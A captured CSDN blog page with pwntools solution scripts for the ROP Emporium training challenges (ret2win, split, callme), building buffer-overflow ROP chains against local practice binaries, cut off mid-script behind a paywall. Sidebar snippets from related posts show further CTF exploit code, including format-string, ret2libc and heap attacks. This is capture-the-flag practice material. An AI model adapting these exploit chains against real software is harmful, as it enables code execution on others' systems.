ropemporium新通关脚本

最新推荐文章于 2021-06-27 23:11:36 发布
最新推荐文章于 2021-06-27 23:11:36 发布
阅读量256 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pondzhang/article/details/108836979
版权
1)ret2win32from pwn import *catflag = 0x0804862Cp = process('./ret2win32')payload = 'A'*0x28 + p32(0) + p32(catflag) p.recvuntil('> ')p.send(payload)p.interactive()2)ret2winfrom pwn import *catflag = 0x0000000000400756p = process('./ret2win'
摘要由CSDN通过智能技术生成 
1)ret2win32
from pwn import *
catflag = 0x0804862C
p = process('./ret2win32')
payload = 'A'*0x28 + p32(0) + p32(catflag) 
p.recvuntil('> ')
p.send(payload)
p.interactive()

2)ret2win
from pwn import *
catflag = 0x0000000000400756
p = process('./ret2win')
elf = ELF('./ret2win')
#gdb.attach(p, "b* 0x00000000004006E8")
payload = 'A'*0x20 + p64(0) + p64(catflag) 
p.recvuntil('> ')
p.send(payload)
p.interactive()

3) split32
from pwn import *
pltsystem = 0x080483E0 
usefulString = 0x0804A030
p = process('./split32')
payload = 'A'*0x28 + p32(0) + p32(pltsystem) + p32(0) + p32(usefulString)
p.recvuntil('> ')
p.send(payload)
p.interactive()

4) split
from pwn import *
pltsystem = 0x0000000000400560 
usefulString = 0x0000000000601060
poprdiret = 0x00000000004007c3
p = process('./split')
payload = 'A'*0x20 + p64(0) + p64(poprdiret) + p64(usefulString) + p64(pltsystem)
p.recvuntil('> ')
p.send(payload)
p.interactive()

5)callme32
from pwn import *
usefulString = 0x0804874F
param1 = 0xDEADBEEF
param2 = 0xCAFEBABE
param3 = 0xD00DF00D
plt_callme_one = 0x080484F0
plt_callme_two = 0x08048550
plt_callme_three = 0x080484E0
pop_esi_edi_ebp_ret = 0x080487f9
pop_ebx_esi_edi_ebp_ret = 0x080487f8
p = process('./callme32')
gdb.attach(p,"b *main")
#payload = 'A'*0x28 + p32(0) + p32(plt_callme_one) + p32(0) + p32(param1) + p32(param2) + p32(param3)  + p32(plt_callme_two) + p32(0) + p32(param1) + p32(param2) + p32(param3)+ p32(0) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)
payload = 'A'*0x28 + p32(0) + p32(plt_callme_one) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3) + p32(plt_callme_two) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)+ p32(plt_callme_three) + p32(pop_esi_edi_ebp_ret) + p32(param1) + p32(param2) + p32(param3)
p.recvuntil('> ')
p.send(payload)
p.interactive()

6)callme
from pwn import *
usefulString = 0x0804874F
param1 = 0xDEADBEEFDEADBEEF
param2 = 0xCAFEBABECAFEBABE
param3 = 0xD00DF00DD00DF00D
plt_callme_one = 0x0000000000400720 
plt_callme_two = 0x0000000000400740
plt_callme_three = 0x00000000004006F0
pop_rdi_rsi_pop_ret = 0x000000000040093c
p = process('./callme')
#gdb.attach(p,"b *main")
payload = 'A'*0x20 + p64(0) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64(param2) + p64(param3) + p64(plt_callme_one) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64(param2) + p64(param3) + p64(plt_callme_two) + p64(pop_rdi_rsi_pop_ret) + p64(param1) + p64
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
WebGoat通关详解.zip
03-22
在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,涵盖了SQL注入、跨站脚本(XSS)、命令注入、权限管理、会话劫持等多种常见Web漏洞。 以下是WebGoat中...
小白详解rop emporium
BadRer的博客
08-02 2087
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 239
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
pwn学习-攻防世界(二)
qq_45653588的博客
01-18 421
文章目录0X00 pwn-1000x01 monkey0x02 stack20x03 pwn-2000x04 welpwn 0X00 pwn-100 下载文件,只开启了NX保护。 反编译一下,main函数调用了sub_40068E()函数,然后sub_40068E()函数调用了sub_40063D函数,第一个参数为v1,第二个参数为200. int sub_40068E() { char v1; // [rsp+0h] [rbp-40h] sub_40063D((__int64)&v1,
buuoj level3 x64 return to libc
pondzhang的专栏
04-29 232
from pwn import * #p = process('./pwn') #p = process('./level3_x64') p = remote("node3.buuoj.cn",25333) p.recvuntil("Input:\n") libc = ELF('./libc-2.23.so') poprdiret = 0x00000000004006b3 poprsir15r...
NCTF-2018-PWN之假的真PWN的writeup
热门推荐
单核CPU的小朋友的博客
11-17 3万+
首先按照题目要求下载文件。很容易通过该源代码看出危险函数gets会覆盖结构体的地址。 这里题目要求我们使用nc命令。但是很明显我们需要通过16进制数来进行攻击,而\X在nc中会被转换成实体,所以我们并不能通过NC来进行攻击。这也是我之前在做这类PWN题的时候所遇到的问题。 现在先放出题目地址,https://nctf.x1c.club/challenges#Pwn python脚本 我们可以通过...
2022年自考电子商务概论通关秘籍.doc
11-18
2022年自考电子商务概论通关秘籍.doc
副本一条龙脚本_079脚本_冒险岛079NPC脚本_
10-03
【标题】"副本一条龙脚本_079脚本_冒险岛079NPC脚本_" 指向的是一个适用于冒险岛游戏079版本的自动化脚本,主要用于处理副本一条龙活动的奖励发放。这样的脚本在游戏环境中通常是为了简化玩家在副本活动中的繁琐操作...
ROPEmporium通关全解(五)
Yale的博客
12-24 343
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
实验5-通用gadget之lab4
qq_44759495的博客
04-16 264
实验原理与目的 上一篇以及介绍了实验原理,就是程序在编译时会加入一些通用函数来进行初始化操作,我们可以针对初始化函数来提取一些通用的gadget,通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令ret连接代码,最终getshell。然而本次实验比较巧妙的地方就是利用了leave指令。 leave|ret leave指令其实是两...
[第五空间2019 决赛]PWN5
pondzhang的专栏
04-27 802
from pwn import * #p = process('./pwn') p = remote("node3.buuoj.cn",25955) addr_unk_804C044 = 0x0804C044 payload = fmtstr_payload(10,{addr_unk_804C044:0x01}) p.sendlineafter('your name:',payload) p.se...
buuoj BJDCTF 2nd r2t3
pondzhang的专栏
03-26 699
buf定义长度为0x400。而buf的长度为0x408 所以不存在溢出。 可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
ZJCTF 2019 Login
pondzhang的专栏
05-19 642
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
buuoj BJDCTF 2nd one_gadget
pondzhang的专栏
03-25 616
程序输出printf函数地址 可以利用工具one_gadget计算libc基址 from pwn import * #p = process('./one_gadget') p = remote("node3.buuoj.cn",26742) out = p.recv() addr = int(out[out.find('0x')+2:out.find('0x')+14],16) ...
GKCTF2021 checkin
pondzhang的专栏
06-27 505
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 494
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
hitcontraining magicheap
pondzhang的专栏
06-16 354
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
ciscn2019 pwn3
pondzhang的专栏
05-26 351
from pwn import * p = process("./ciscn_2019_n_3") elf = ELF('./ciscn_2019_n_3') def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin
bjdctf2020 babystack
pondzhang的专栏
05-08 347
from pwn import * p = process('./bjdctf_2020_babystack') p.recvuntil("length of your name:\n") p.sendline('1024') p.recvuntil("What's u name?\n") payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...
通关判断网络来确定是否断电shell脚本
最新发布
07-22
下面是一个示例的Shell脚本,用于检测网络是否断电: ```bash #!/bin/bash # 设置目标主机的IP地址 target_host="192.168.0.1" # 执行ping命令测试目标主机的连通性 ping -c 1 $target_host > /dev/null # 检查...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值